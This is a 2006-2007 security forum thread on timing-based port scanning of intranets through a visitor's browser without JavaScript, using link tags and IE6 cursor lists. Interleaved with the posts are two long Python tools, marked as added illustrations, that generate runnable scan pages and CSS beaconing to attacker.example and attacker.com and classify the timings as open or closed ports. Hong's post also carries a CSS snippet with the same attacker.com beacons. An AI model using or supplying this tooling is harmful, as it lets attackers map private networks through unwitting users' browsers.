Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: lpilorz
Date: November 29, 2006 09:15AM

I've seen that some of you are interested in Grossman's idea, so maybe we could exchange results? I've made only a very small test case, nothing really interesting, but I'll put some comments here as a start.

1. The link tag seems to work for this in Firefox 2 and IE 7; Opera behaves differently.
2. In IE, you can use e.g. port 1 for time comparison (similar times mean host/port down, shorter means host/port up).
3. Using the 'http://' protocol prefix for port 21 will always give short times, but you can use 'ftp://x:x@'; the downside is an alert in FF (it works fine in IE).

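As an added illustration of the link-tag timing approach lpilorz sketches above (this is not his code, nor Grossman's, nor anything posted in the thread), the following Python builds one scan subpage of interleaved beacon and probe stylesheet links, keeps only a few targets per subpage, and turns the attacker-side beacon timings back into up/down verdicts using his port-1 reference comparison. The beacon host attacker.example, the log line format, the reference time and the target list are all assumptions, constructed for the example. The sequential fetching of stylesheet links that the trick depends on is what the Firefox 2 / IE 7 of the thread did; current browsers fetch them in parallel.

```python
"""Link-tag scan page builder and beacon-timing classifier.

Added illustration for the technique lpilorz describes; it is not code from the
thread, from Grossman, or from lpilorz. Assumed (not from the page): the beacon
endpoint https://attacker.example/b, the target list and the access-log lines,
all of which are constructed sample data.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence


@dataclass(frozen=True)
class Probe:
    host: str
    port: int

    def url(self) -> str:
        # lpilorz's note 3: an http:// URL on port 21 returns too fast to time,
        # so FTP is probed as ftp://x:x@host (silent in IE, an alert in Firefox).
        if self.port == 21:
            return f"ftp://x:x@{self.host}/"
        return f"http://{self.host}:{self.port}/"


def chunk_of(probes: Sequence[Probe], page: int, per_page: int) -> List[Probe]:
    """Targets for one subpage. Keeping only a few per page bounds how long a
    page can hang on unresponsive hosts; the server tracks `page` itself."""
    return list(probes[page * per_page:(page + 1) * per_page])


def build_scan_page(probes: Sequence[Probe], beacon: str,
                    page: int = 0, per_page: int = 4) -> str:
    """HTML for one subpage: beacon, probe, beacon, probe, ..., closing beacon.

    The trick needs the browser to fetch stylesheet links one after another in
    document order, which held for the Firefox 2 / IE 7 of the thread (current
    browsers fetch them in parallel). Under that assumption the time between
    beacon hit i and hit i+1 on the attacker's server is the time the browser
    spent connecting to probe i.
    """
    chunk = chunk_of(probes, page, per_page)
    tags = []
    for i, probe in enumerate(chunk):
        tags.append(f'<link rel="stylesheet" href="{beacon}/{page}/{i}">')
        tags.append(f'<link rel="stylesheet" href="{probe.url()}">')
    tags.append(f'<link rel="stylesheet" href="{beacon}/{page}/{len(chunk)}">')
    return "<html><head>\n" + "\n".join(tags) + "\n</head><body></body></html>"


def probe_times(beacon_log: Sequence[str], page: int) -> List[Optional[float]]:
    """Turn attacker-side log lines "<ms> <path>" (constructed format) into the
    milliseconds the browser spent on each probe of `page`. A missing beacon
    (browser stalled, user navigated away) yields None for both neighbouring
    probes instead of charging the whole gap to one of them."""
    hits: Dict[int, float] = {}
    for line in beacon_log:
        ts, path = line.split(maxsplit=1)
        _, p, i = path.strip().rsplit("/", 2)
        if int(p) == page:
            hits[int(i)] = float(ts)
    if not hits:
        return []
    return [hits[i + 1] - hits[i] if i in hits and i + 1 in hits else None
            for i in range(max(hits))]


def classify(elapsed: Sequence[Optional[float]], reference_ms: float,
             ratio: float = 0.5) -> List[str]:
    """lpilorz's note 2 as a rule: time a reference probe that is expected to
    wait out the connect timeout (he uses port 1 on the host in IE) and compare.
    A similar time means the host/port is down; a clearly shorter time means the
    browser got an answer, i.e. host/port up."""
    return ["unknown" if t is None else "up" if t < ratio * reference_ms else "down"
            for t in elapsed]


# Constructed sample data: RFC 1918 targets and an invented attacker access log.
BEACON = "https://attacker.example/b"
TARGETS = [Probe("10.0.0.1", 80), Probe("10.0.0.1", 21), Probe("10.0.0.2", 80)]
REFERENCE_MS = 21000.0  # constructed: how long a probe that times out takes
SAMPLE_LOG = [
    "1000 /b/0/0",
    "1090 /b/0/1",    # 10.0.0.1:80 answered after ~90 ms
    "1200 /b/0/2",    # ftp://10.0.0.1 answered after ~110 ms
    "22300 /b/0/3",   # 10.0.0.2:80 took ~21 s, the same as the reference
]


def scan_result(page: int = 0) -> Dict[str, str]:
    """Map each probed URL on `page` to up/down/unknown from the sample log."""
    urls = [p.url() for p in chunk_of(TARGETS, page, 4)]
    return dict(zip(urls, classify(probe_times(SAMPLE_LOG, page), REFERENCE_MS)))


if __name__ == "__main__":
    print(build_scan_page(TARGETS, BEACON))
    print(scan_result())
```

Run it directly to print the generated subpage and the verdicts for the sample log. The reference time is the probe you expect to time out; without one, a single long delay is indistinguishable from a stalled browser, which is why a missing beacon is reported as unknown rather than guessed.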
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: rsnake
Date: November 29, 2006 10:18AM

Vaguely off topic, but is there anything embedded that Lynx calls? I can't think of anything off the top of my head, but maybe I'm not thinking properly. I know Links does call frames, so that may be handy, but I can't think of anything for Lynx offhand.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: rsnake
Date: November 30, 2006 11:26AM

More on the topic: http://ha.ckers.org/blog/20061130/portscanning-without-javascript-part-2/

- RSnake
Gotta love it. http://ha.ckers.org

Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: jungsonn
Date: December 03, 2006 09:24AM

Still I don't understand the practical use of it.
To my knowledge you can just port scan with PHP alone.

Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: maluc
Date: December 03, 2006 10:32AM

/me points back to the ha.ckers blog comments

-maluc

Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: jungsonn
Date: December 03, 2006 02:06PM

I commented back, heck.

Well, most intranets are on the net also, so you could link a stylesheet to a remote PHP file to scan back, or a local PHP file if it runs Linux/PHP.

Or am I completely missing the point? ^-^

Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: rsnake
Date: December 03, 2006 08:59PM

I think you are sort of missing what we are talking about. Intranets aren't on the Internet; they are non-routable. They are behind firewalls and not pingable from the outside (RFC 1918). However, since the user is behind the firewall, they can see the addresses for us. PHP and all server-side port scanning is unable to see what the client can see. So we are using their browser to do what we would normally be able to do for ourselves if we could route to the IPs.

Network Address Translation (NAT) is a security measure used by firewalls to protect internal networks by not giving them actual world-routable addresses. So we get the user to see a malicious piece of JavaScript, and that JavaScript runs on their computer, which is behind the firewall and on the same subnet as the other non-routable machines, and therefore has access to do things we cannot do from a server-side scan of the network, since all we would see is one filtered IP rather than the machines behind that IP.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: jungsonn
Date: December 04, 2006 02:27AM

Yeah, thanks. I understand that, but where do you show that code to the user?
Then you already have access to the intranet; why should you ping ports if you're on it already?

that's what i'm missing here.

Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: rsnake
Date: December 04, 2006 11:53AM

Ah... no, you show them the code on an external site that you have control over (a MySpace page with an XSS vuln or whatever). The JavaScript then attempts to connect to the intranet, using your browser as the conduit. Cross-domain policies don't apply to embedded scripts that are being included, and you can test whether they error out or not. Using an external page you can make a browser scan its own intranet.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: jungsonn
Date: December 04, 2006 12:00PM

Okay, that explains it better :)

I just thought it was meant that some dude was browsing through his intranet to a site, and then you could just ping the living hell out of him with PHP ^_^.

Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: rsnake
Date: December 04, 2006 12:53PM

Yah, it's a confusing concept. It's something I came up with years ago, when I was first looking at looking glass scripts. I thought it was crazy that I could affect networks through a simple command injection issue. Later I thought of ways that you could build Java ping sweeps. Jeremiah took it to the next level by making a port scanner out of JavaScript (instead of my Java idea). Very cool.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: lpilorz
Date: December 18, 2006 12:19PM

Unfortunately I didn't have too much time to continue those tests, until today.

Because of the low speed of link tag scans, I think it could be divided into very small parts, for example 3-4 hosts/ports per subpage, with the current progress stored in the session (Ilia Alshanetsky already suggested it).

Unfortunately, the multipart/x-mixed-replace method causes the browser status bar to reveal the currently scanned addresses, while simply dividing the scan into frames (without multipart/x-mixed-replace) causes Firefox to show only the main domain in the status bar (at least for unresponsive hosts; for those responding, the local IP shows for just a moment). There is still the problem of timeouts for unresponsive hosts, but if you have only 3-4 scanning frames on each subpage, it shouldn't be much of a problem (the local IP does not show in the status bar, and the user causes the scan to continue by going to another subpage).

From what I tried, it doesn't work in IE 6 (don't know about 7), because it shows anything on the page only after loading all link tags (even those from frames). I'll try to do more tests on IE; maybe there is some way to bypass this problem.

Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: Hong
Date: October 25, 2007 01:04PM

I noticed that the cursor property in IE6 (don't know about IE7) may be able to launch a port scan without JavaScript. The cursor property lets you define a list of cursors, and if the browser cannot handle the first cursor, it should attempt to handle the second cursor, etc.
In IE6, all GET requests for the cursors follow the sequence of the cursor list. It tries to get the first cursor; if that fails, it tries to get the second; if that fails, the third, and so on. Therefore, we can use the timing attack method like the scanner using link tags in Firefox, i.e.:

p.ip1
{
cursor:
url("http://attacker.com/portscan?ip=ip1&port=port1"),
url("ip1:port1"),
url("http://attacker.com/portscan?ip=ip1&port=port2"),
url("ip1:port2"),
url("http://attacker.com/portscan?ip=ip1&port=port3"),
url("ip1:port3"),
url("http://attacker.com/portscan?ip=ip1&port=port4"),
...
pointer
}

p.ip2
{
cursor:
url("http://attacker.com/portscan?ip=ip2&port=port1"),
url("ip2:port1"),
url("http://attacker.com/portscan?ip=ip2&port=port2"),
url("ip2:port2"),
url("http://attacker.com/portscan?ip=ip2&port=port3"),
url("ip2:port3"),
url("http://attacker.com/portscan?ip=ip2&port=port4"),
...
pointer
}

- Hong

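Hong's cursor-list layout above, as an added Python example that generates the rule for any host and port list (this is not Hong's code; the beacon URL http://attacker.com/portscan is taken from his snippet, the hosts are constructed sample data). Each host's list is bracketed so the last probe has a beacon after it too, and the one way the chain can stop early is called out.

```python
"""IE6 cursor-list variant of the beacon/probe interleaving (Hong's idea).

Added illustration; not Hong's code. The beacon URL http://attacker.com/portscan
is taken from Hong's snippet; the host list is constructed sample data.
"""
from typing import Dict, List, Sequence, Tuple


def cursor_rule(selector: str, host: str, ports: Sequence[int],
                beacon: str = "http://attacker.com/portscan") -> str:
    """One CSS rule whose cursor list alternates beacon and probe URLs.

    Hong's observation: IE6 requests the cursor URLs in list order and only
    moves to the next after the current one fails to load as a cursor, so the
    gap between the beacon before and the beacon after a probe is the time
    spent connecting to it. The list ends with the generic keyword `pointer`.
    Caveat: a probe that happened to serve a valid .cur file would stop the
    chain there, so each beacon hit also records how far the chain got.
    """
    items: List[str] = []
    for port in ports:
        items.append(f'url("{beacon}?ip={host}&port={port}")')
        items.append(f'url("http://{host}:{port}/")')
    items.append(f'url("{beacon}?ip={host}&port=done")')  # closes the last probe
    items.append("pointer")
    return f"{selector} {{ cursor: {', '.join(items)}; }}"


def build_stylesheet(hosts: Dict[str, Sequence[int]]) -> str:
    """A <style> block plus one <p> per host so each rule is applied; one rule
    per host, in the order given, as in Hong's p.ip1 / p.ip2 layout."""
    rules, body = [], []
    for n, (host, ports) in enumerate(hosts.items(), start=1):
        rules.append(cursor_rule(f"p.ip{n}", host, ports))
        body.append(f'<p class="ip{n}">&nbsp;</p>')
    return "<style>\n" + "\n".join(rules) + "\n</style>\n" + "\n".join(body)


def beacon_target(query: str) -> Tuple[str, str]:
    """Parse a beacon hit's query string back to (host, port or 'done') so the
    attacker's log handler knows which probe the following gap belongs to."""
    params = dict(part.split("=", 1) for part in query.split("&"))
    return params["ip"], params["port"]


# Constructed sample data (private addresses, no real hosts).
SAMPLE_HOSTS = {"10.0.0.1": [80, 443], "10.0.0.2": [21, 80]}

if __name__ == "__main__":
    print(build_stylesheet(SAMPLE_HOSTS))
```

The timing side is the same as for the link-tag version: the server logs the arrival time of each beacon hit and attributes the gap to the probe named by the preceding beacon.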
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Date: October 26, 2007 01:42AM

Nice work, Hong.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: rsnake
Date: November 11, 2007 02:07PM

Without testing this thoroughly, are you saying that a correct IP/port will take longer or shorter than an incorrect/invalid IP/port?

- RSnake
Gotta love it. http://ha.ckers.org
